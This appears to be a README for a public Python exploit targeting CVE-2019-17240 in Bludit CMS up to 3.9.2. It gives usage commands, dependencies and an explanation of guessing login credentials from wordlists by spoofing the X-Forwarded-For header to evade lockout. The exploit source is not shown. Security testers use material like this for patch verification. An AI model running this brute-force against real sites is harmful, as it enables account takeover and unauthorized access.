Exploit Code for CVE-2019-17240 aka Bludit <= 3.9.2 Bruteforce Mitigation Bypass
Exploit Links: [ExploitDB-48942] [PacketStorm]
Expected outcome: Discover login credentials, bypassing Brute-force Mechanism on host running Bludit <=3.9.2
Intended only for educational and testing in corporate environments.
This Exploit was tested on Python 3.8.6
cfx: ~/bludit
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERLIST] [-p PASSLIST]
Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL Path to Bludit (Example: http://127.0.0.1/admin/login.php)
-u USERLIST, --userlist USERLIST
Username Dictionary
-p PASSLIST, --passlist PASSLIST
Password Dictionary
Exploit Usage :
./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt- Make sure Python3 is installed with following additional modules:
- requests
- pwn
Installation:
pip3 install pwn
pip3 install requestsThis exploit expects three user inputs :
- URL : Login Page url
- User.txt : Potential list of Usernames, for PoC purpose we have single username in user.txt
- Pass.txt : Dictionary with list of Passwords
Exploit usage where the username inside user.txt is mapped against every password inside pass.txt and sent to login:
Values are sent into X-Forwarded-For header from pass.txt, if the list contains less number of passwords chances are there that a word gets blocked by the server, in that case the script will show the blocked word in the output:
On successful login, following output with working credentials would be shown:
This is an exploit for the vulnerability found by Rastating on Bludit CMS.
Vulnerability explanation: https://rastating.github.io/bludit-brute-force-mitigation-bypass/.
Patch: bludit/bludit#1090